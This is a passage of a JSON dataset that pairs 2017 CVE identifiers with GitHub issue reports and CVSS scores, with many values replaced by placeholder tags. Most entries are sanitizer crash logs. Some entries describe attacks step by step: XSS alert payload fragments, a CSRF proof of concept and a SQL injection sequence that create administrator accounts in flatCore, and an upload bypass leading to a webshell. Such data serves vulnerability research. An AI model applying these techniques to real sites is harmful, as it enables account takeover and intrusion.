fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
  14179. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14180. "severity": "MEDIUM",
  14181. "baseScore": 5.5,
  14182. "impactScore": 3.6,
  14183. "exploitabilityScore": 1.8
  14184. },
  14185. {
  14186. "CVE_ID": "CVE-2017-7624",
  14187. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/10",
  14188. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/10",
  14189. "Repo_new": "jsummers/imageworsener",
  14190. "Issue_Created_At": "2017-04-03T06:07:55Z",
  14191. "description": "memory leak in imagew cmd. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG e0ad6 in malloc PATHTAG NUMBERTAG b7b in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_large PATHTAG NUMBERTAG ffe4 in bmpr_read_uncompressed PATHTAG NUMBERTAG be in iwbmp_read_bits PATHTAG NUMBERTAG e8 in iw_read_bmp_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG fc NUMBERTAG fb NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
  14192. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14193. "severity": "MEDIUM",
  14194. "baseScore": 5.5,
  14195. "impactScore": 3.6,
  14196. "exploitabilityScore": 1.8
  14197. },
  14198. {
  14199. "CVE_ID": "CVE-2017-7649",
  14200. "Issue_Url_old": "https://github.com/eclipse/kura/issues/956",
  14201. "Issue_Url_new": "https://github.com/eclipse/kura/issues/956",
  14202. "Repo_new": "eclipse/kura",
  14203. "Issue_Created_At": "2016-12-16T18:03:33Z",
  14204. "description": "APITAG Kura firewall rules bypassed with IP NUMBERTAG The firewall rules set by Kura can be bypassed using IP NUMBERTAG The Kura install scripts, for installers that include network management, should disable IP NUMBERTAG on the host system. We will remove this once we add proper support to IP NUMBERTAG in Kura.",
  14205. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14206. "severity": "CRITICAL",
  14207. "baseScore": 9.8,
  14208. "impactScore": 5.9,
  14209. "exploitabilityScore": 3.9
  14210. },
  14211. {
  14212. "CVE_ID": "CVE-2017-7694",
  14213. "Issue_Url_old": "https://github.com/symphonycms/symphony-2/issues/2655",
  14214. "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2655",
  14215. "Repo_new": "symphonycms/symphonycms",
  14216. "Issue_Created_At": "2017-04-07T21:49:25Z",
  14217. "description": "security bug Reported.",
  14218. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  14219. "severity": "HIGH",
  14220. "baseScore": 8.8,
  14221. "impactScore": 5.9,
  14222. "exploitabilityScore": 2.8
  14223. },
  14224. {
  14225. "CVE_ID": "CVE-2017-7695",
  14226. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/276",
  14227. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/276",
  14228. "Repo_new": "bigtreecms/bigtree-cms",
  14229. "Issue_Created_At": "2017-04-07T07:52:13Z",
  14230. "description": "Unrestricted File Upload Reported. Exploit Title: Unrestricted File Upload Vulnerability Type: Accessing, Modifying or Executing Executable Files (CAPEC NUMBERTAG Reporting Date NUMBERTAG Author: MENTIONTAG Vendor Homepage: FILETAG Software Link: URLTAG Version NUMBERTAG I. Abstract APITAG CMS is publicly licensed under the GNU Lesser General Public License It is an open source content management system built on PHP and APITAG II. Introduction NUMBERTAG Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface NUMBERTAG ulnerability analysis for bigtree cms At the file PATHTAG line NUMBERTAG The code of Regular expression shows that i could be bypassed by upload a file Name APITAG var APITAG = PATHTAG APITAG Then the attacker could get a webshell by using this method III. References NUMBERTAG CAPEC NUMBERTAG CVETAG NUMBERTAG URLTAG",
  14231. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14232. "severity": "CRITICAL",
  14233. "baseScore": 9.8,
  14234. "impactScore": 5.9,
  14235. "exploitabilityScore": 3.9
  14236. },
  14237. {
  14238. "CVE_ID": "CVE-2017-7697",
  14239. "Issue_Url_old": "https://github.com/erikd/libsamplerate/issues/11",
  14240. "Issue_Url_new": "https://github.com/libsndfile/libsamplerate/issues/11",
  14241. "Repo_new": "libsndfile/libsamplerate",
  14242. "Issue_Created_At": "2017-04-11T09:11:28Z",
  14243. "description": "global buffer overflow in calc_output_single (src_sinc.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  14244. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14245. "severity": "MEDIUM",
  14246. "baseScore": 5.5,
  14247. "impactScore": 3.6,
  14248. "exploitabilityScore": 1.8
  14249. },
  14250. {
  14251. "CVE_ID": "CVE-2017-7716",
  14252. "Issue_Url_old": "https://github.com/radare/radare2/issues/7260",
  14253. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7260",
  14254. "Repo_new": "radareorg/radare2",
  14255. "Issue_Created_At": "2017-04-12T11:33:52Z",
  14256. "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Tested on Git HEAD: APITAG Payload: URLTAG Command: APITAG ASAN: ERRORTAG",
  14257. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14258. "severity": "MEDIUM",
  14259. "baseScore": 5.5,
  14260. "impactScore": 3.6,
  14261. "exploitabilityScore": 1.8
  14262. },
  14263. {
  14264. "CVE_ID": "CVE-2017-7854",
  14265. "Issue_Url_old": "https://github.com/radare/radare2/issues/7265",
  14266. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7265",
  14267. "Repo_new": "radareorg/radare2",
  14268. "Issue_Created_At": "2017-04-13T11:01:41Z",
  14269. "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Tested on Git HEAD: APITAG Payload: radare/radare2 regressions NUMBERTAG Command: APITAG ASAN: ERRORTAG",
  14270. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14271. "severity": "MEDIUM",
  14272. "baseScore": 5.5,
  14273. "impactScore": 3.6,
  14274. "exploitabilityScore": 1.8
  14275. },
  14276. {
  14277. "CVE_ID": "CVE-2017-7871",
  14278. "Issue_Url_old": "https://github.com/trollepierre/tdm/issues/50",
  14279. "Issue_Url_new": "https://github.com/trollepierre/tdm/issues/50",
  14280. "Repo_new": "trollepierre/tdm",
  14281. "Issue_Created_At": "2017-03-24T05:14:54Z",
  14282. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtration of user supplied data in \"challenge\" HTTP parameter that will be passed to \"tdm APITAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  14283. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14284. "severity": "MEDIUM",
  14285. "baseScore": 6.1,
  14286. "impactScore": 2.7,
  14287. "exploitabilityScore": 2.8
  14288. },
  14289. {
  14290. "CVE_ID": "CVE-2017-7877",
  14291. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/27",
  14292. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/27",
  14293. "Repo_new": "flatcore/flatcore-cms",
  14294. "Issue_Created_At": "2017-04-08T04:40:49Z",
  14295. "description": "CSRF Privilege Escalation APITAG of an administrator account) on APITAG NUMBERTAG Exploit Title: CSRF Privilege Escalation APITAG of an administrator account) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: Using Cross Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of APITAG we can use CSRF to perform actions on the admin dashboard by targeting an administrator. Exploit: We assume that APITAG is installed at APITAG . Our target is APITAG which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges. CODETAG Before running the POC, make sure you are logged in into an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created. References: URLTAG URLTAG Screenshots: Before the exploit FILETAG Exploit Page FILETAG After submitting the form FILETAG New user added FILETAG With admin access FILETAG Impact: Compromises the entire web application and user data Mitigation: Use of CSRF tokens Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the APITAG Headers (HTML)_ features can be misused to inject JS into the website.",
  14296. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14297. "severity": "HIGH",
  14298. "baseScore": 8.8,
  14299. "impactScore": 5.9,
  14300. "exploitabilityScore": 2.8
  14301. },
  14302. {
  14303. "CVE_ID": "CVE-2017-7878",
  14304. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/29",
  14305. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/29",
  14306. "Repo_new": "flatcore/flatcore-cms",
  14307. "Issue_Created_At": "2017-04-11T15:48:28Z",
  14308. "description": "SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Exploit Title: SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Exploit: The vulnerability is due to a non parameterized SQL query at URLTAG This vulnerability along with missing validation on the email field of the registration and password reset forms can be used to create an administrator account with full privileges. We assume that APITAG is installed at APITAG and new registrations are enabled NUMBERTAG Go to APITAG . Fill in the username ERRORTAG and some password. Fill in the email fields as ERRORTAG . This step is required since the password reset form checks for valid emails in the DB before reset NUMBERTAG Since the register page uses parameterized query, the whole email string will be stored in the DB NUMBERTAG Now go to APITAG and put in the email address mentioned while registering. Due to URLTAG the query will effectively become ERRORTAG NUMBERTAG As you can see, this will set administrator as the user class for now newly created user ERRORTAG and will also give it permissions to manage the user management screen NUMBERTAG Once inside the admin panel, the attacker can give himself extra privileges. References: URLTAG Screenshots: Registration Form FILETAG Password Reset FILETAG New user created and verified with ability to edit users FILETAG Logged in as new user and change privileges FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation on email fields",
  14309. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14310. "severity": "CRITICAL",
  14311. "baseScore": 9.8,
  14312. "impactScore": 5.9,
  14313. "exploitabilityScore": 3.9
  14314. },
  14315. {
  14316. "CVE_ID": "CVE-2017-7879",
  14317. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/28",
  14318. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/28",
  14319. "Repo_new": "flatcore/flatcore-cms",
  14320. "Issue_Created_At": "2017-04-11T07:17:33Z",
  14321. "description": "SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Exploit Title: SQL Injection vulnerability APITAG DB) on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author: MENTIONTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Exploit: The vulnerability is due to a non parameterized SQL query at URLTAG and a few following lines. We assume that APITAG is installed at APITAG . The exploit URL is APITAG . This effectively results in the following query to be executed APITAG which allows an unauthenticated user to be able to view all ghost/invisible pages without having links to them. The exploit URL can also be possibly modified to leak the content database using UNION based SQL injection attacks. References: URLTAG Screenshots: Viewing ghost pages FILETAG Impact: Read data from the content database Mitigation: Use of Parameterized SQL Queries",
  14322. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  14323. "severity": "HIGH",
  14324. "baseScore": 7.5,
  14325. "impactScore": 3.6,
  14326. "exploitabilityScore": 3.9
  14327. },
  14328. {
  14329. "CVE_ID": "CVE-2017-7891",
  14330. "Issue_Url_old": "https://github.com/sbpp/sourcebans-pp/issues/253",
  14331. "Issue_Url_new": "https://github.com/sbpp/sourcebans-pp/issues/253",
  14332. "Repo_new": "sbpp/sourcebans-pp",
  14333. "Issue_Created_At": "2017-04-13T08:45:50Z",
  14334. "description": "XSS vulnerability in FILETAG . There is a reflective XSS vulnerability in the NUMBERTAG line of the FILETAG file. Hackers can exploit this vulnerability to obtain an administrator's cookies. URLTAG \"); APITAG APITAG APITAG APITAG alert(\"a Effect in browser: FILETAG FILETAG code: FILETAG Do not print the user input data directly on the page. Please. My English is so poor. Could you help me apply for a CVE number for this vulnerability? I need it. Thank you very much\u3002 Version used NUMBERTAG PHP and APITAG version: APITAG mysql5 Operating System and version: windows NUMBERTAG Link to your project:localhost",
  14335. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14336. "severity": "MEDIUM",
  14337. "baseScore": 6.1,
  14338. "impactScore": 2.7,
  14339. "exploitabilityScore": 2.8
  14340. },
  14341. {
  14342. "CVE_ID": "CVE-2017-7939",
  14343. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/13",
  14344. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/13",
  14345. "Repo_new": "jsummers/imageworsener",
  14346. "Issue_Created_At": "2017-04-08T17:19:17Z",
  14347. "description": "stack buffer overflow in read_next_pam_token. on APITAG NUMBERTAG imagew $FILE FILETAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 at pc NUMBERTAG c bp NUMBERTAG ffd NUMBERTAG d NUMBERTAG f NUMBERTAG sp NUMBERTAG ffd NUMBERTAG d NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 thread T NUMBERTAG b in read_next_pam_token src/imagew APITAG NUMBERTAG a7c in iwpnm_read_pam_header src/imagew APITAG NUMBERTAG aa in iwpnm_read_header src/imagew APITAG NUMBERTAG e in iw_read_pnm_file src/imagew APITAG NUMBERTAG f in iw_read_pam_file src/imagew APITAG NUMBERTAG b2a6 in iw_read_file_by_fmt src/imagew APITAG NUMBERTAG in iwcmd_run src/imagew APITAG NUMBERTAG bfb in iwcmd_main src/imagew APITAG NUMBERTAG cde in main src/imagew APITAG NUMBERTAG fb NUMBERTAG f NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG PATHTAG ) Address NUMBERTAG ffd NUMBERTAG d NUMBERTAG a4 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a5 in iwpnm_read_pam_header src/imagew APITAG This frame has NUMBERTAG object(s NUMBERTAG curpos NUMBERTAG linebuf' APITAG NUMBERTAG ab NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG ab NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG ab NUMBERTAG f4 f4 f NUMBERTAG ab NUMBERTAG f3 f3 f3 f NUMBERTAG ab NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG ab NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
  14348. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14349. "severity": "MEDIUM",
  14350. "baseScore": 5.5,
  14351. "impactScore": 3.6,
  14352. "exploitabilityScore": 1.8
  14353. },
  14354. {
  14355. "CVE_ID": "CVE-2017-7940",
  14356. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/18",
  14357. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/18",
  14358. "Repo_new": "jsummers/imageworsener",
  14359. "Issue_Created_At": "2017-04-17T14:50:49Z",
  14360. "description": "memory leak in imagew cmd. on APITAG NUMBERTAG imagew $FILE out.pnm APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f1ac NUMBERTAG dbb8 in __interceptor_malloc PATHTAG NUMBERTAG ERRORTAG b NUMBERTAG in my_mallocfn src/imagew APITAG NUMBERTAG a NUMBERTAG c in iw_malloc_ex src/imagew APITAG NUMBERTAG a8a7 in iw_malloc_large src/imagew APITAG NUMBERTAG f NUMBERTAG in iwgif_init_screen src/imagew APITAG NUMBERTAG d7 in iwgif_read_image src/imagew APITAG NUMBERTAG in iwgif_read_main src/imagew APITAG NUMBERTAG cde in iw_read_gif_file src/imagew APITAG NUMBERTAG b NUMBERTAG in iw_read_file_by_fmt src/imagew APITAG NUMBERTAG in iwcmd_run src/imagew APITAG NUMBERTAG bfb in iwcmd_main src/imagew APITAG NUMBERTAG cde in main src/imagew APITAG NUMBERTAG f1ac NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
  14361. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14362. "severity": "MEDIUM",
  14363. "baseScore": 5.5,
  14364. "impactScore": 3.6,
  14365. "exploitabilityScore": 1.8
  14366. },
  14367. {
  14368. "CVE_ID": "CVE-2017-7941",
  14369. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/428",
  14370. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/428",
  14371. "Repo_new": "imagemagick/imagemagick",
  14372. "Issue_Created_At": "2017-04-17T15:34:24Z",
  14373. "description": "memory leak in sgi. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG d1d7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG d1d7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: URLTAG",
  14374. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14375. "severity": "MEDIUM",
  14376. "baseScore": 6.5,
  14377. "impactScore": 3.6,
  14378. "exploitabilityScore": 2.8
  14379. },
  14380. {
  14381. "CVE_ID": "CVE-2017-7942",
  14382. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/429",
  14383. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/429",
  14384. "Repo_new": "imagemagick/imagemagick",
  14385. "Issue_Created_At": "2017-04-17T15:34:50Z",
  14386. "description": "memory leak in avs. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc8c NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ed NUMBERTAG in APITAG APITAG NUMBERTAG e3c7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc8c1ab0b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc8c NUMBERTAG a NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG e3c7 in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc8c1ab0b NUMBERTAG in __libc_start_main APITAG testcase: FILETAG",
  14387. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14388. "severity": "MEDIUM",
  14389. "baseScore": 6.5,
  14390. "impactScore": 3.6,
  14391. "exploitabilityScore": 2.8
  14392. },
  14393. {
  14394. "CVE_ID": "CVE-2017-7943",
  14395. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/427",
  14396. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/427",
  14397. "Repo_new": "imagemagick/imagemagick",
  14398. "Issue_Created_At": "2017-04-17T15:33:26Z",
  14399. "description": "memory leak in svg. on APITAG latest version identify $FILE APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f6a NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f9da in APITAG APITAG NUMBERTAG ae6ca in APITAG APITAG NUMBERTAG f NUMBERTAG d8 in APITAG APITAG NUMBERTAG e4e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1a NUMBERTAG in APITAG APITAG NUMBERTAG bba NUMBERTAG in APITAG APITAG NUMBERTAG c NUMBERTAG fea in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f6a NUMBERTAG b NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG",
  14400. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14401. "severity": "MEDIUM",
  14402. "baseScore": 6.5,
  14403. "impactScore": 3.6,
  14404. "exploitabilityScore": 2.8
  14405. },
  14406. {
  14407. "CVE_ID": "CVE-2017-7946",
  14408. "Issue_Url_old": "https://github.com/radare/radare2/issues/7301",
  14409. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7301",
  14410. "Repo_new": "radareorg/radare2",
  14411. "Issue_Created_At": "2017-04-18T09:55:20Z",
